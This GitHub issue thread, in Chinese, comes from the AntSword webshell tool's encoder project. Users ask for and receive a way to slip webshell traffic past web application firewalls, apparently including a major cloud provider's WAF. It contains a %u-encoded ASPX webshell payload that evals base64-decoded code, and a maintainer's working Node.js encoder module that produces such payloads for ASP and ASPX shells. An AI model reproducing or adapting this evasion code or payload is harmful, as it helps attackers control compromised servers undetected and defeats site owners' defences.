### ISSUE TITLE
能否增加unicode编码器

### ISSUE THREAD

**Issue by yzddmr6** [AntSwordProject/AwesomeEncoder#2]
现在蚁剑aspx的各个编码器都被拦截
经过测试只要unicode编码就可以绕过

所以想问能否官方推出一个unicode编码器,将字符unicode编码
像2016版菜刀一样
至今还可以绕过某里云的waf

test=%u0052%u0065sponse%u002E%u0057rit%u0065("X@Y");var %u0065rr:%u0045xc%u0065ption;
%u0074ry%u007B%u0065val(Syst%u0065m%u002ET%u0065xt%u002E%u0045ncoding%u002EG%u0065t%u0045ncoding(936)%u002EG%u0065tString(Syst%u0065m.Conv%u0065rt%u002EFromBas%u006564String("xxxxxxxxxxxxxxxxxxxxxxxxxxxx")),"unsaf%u0065");
%u007Dcatch(err)%u007B%u0052esponse%u002E%u0057rite("ER"%2B"ROR:// "%2Berr.message);%u007D%u0052%u0065sponse.%u0057rit%u0065("X@Y");%u0052espons%u0065.%u0045nd();

unicode编码对于asp跟aspx都可以适用

自己也尝试改了一下,是直接改的源payload
但是在修改的过程中
![image](https://user-images.githubusercontent.com/46088090/58691933-faba0d00-83bf-11e9-93f2-9b0dd7d787f2.png)
增加()后还是会被url编码
![image](https://user-images.githubusercontent.com/46088090/58691965-10c7cd80-83c0-11e9-9e0f-cccd5fb4d45a.png)

也不知道nodejs如何实现这种编码......
编码可以参考这个网站
http://www.bejson.com/convert/unicode_chinese/

**Comment by yzddmr6** [comment]
或者能否像编码器一样 在源payload也增加一个禁止url编码的标记

**Comment by Medicean** [comment]
这个很简单啊，你用 `asunescape`就完事了

**Comment by yzddmr6** [comment]
啊啊啊打扰了打扰了
我看成就加一个()完事了
现在关现在关

**Comment by Medicean** [comment]
```
/**
 * aspx::url_unicode 编码器
 * 把字符转成 %uXXXX 形式
 * eg: Re => %u0052%u0065
 * Create at: 2019/05/31 17:11:01
 */

'use strict';

function char2unicode(c) {
  if(c.length != 1) {
    return '';
  }
  let buff = Buffer.alloc(4, '0');
  let hexstr = c.charCodeAt().toString(16);
  buff.write(hexstr, buff.length - hexstr.length, hexstr.length);
  return "\\u" + buff.toString();
}

function string2unicode(str){
    var ret = "";
    for(var i=0; i<str.length; i++){
        ret += char2unicode(str[i]);
    }
    return ret;
}

/*
* @param  {String} pwd   连接密码
* @param  {Array}  data  编码器处理前的 payload 数组
* @return {Array}  data  编码器处理后的 payload 数组
*/
module.exports = (pwd, data, ext={}) => {
  data[pwd] = string2unicode(data['_']).replace(/\\u/g, 'asunescape(%)u');
  // 删除 _ 原有的payload
  delete data['_'];
  // 返回编码器处理后的 payload 数组
  return data;
}
```

**Comment by yzddmr6** [comment]
OK 
谢谢

**Comment by yzddmr6** [comment]
经过测试
asp的shell也同样使用此编码器
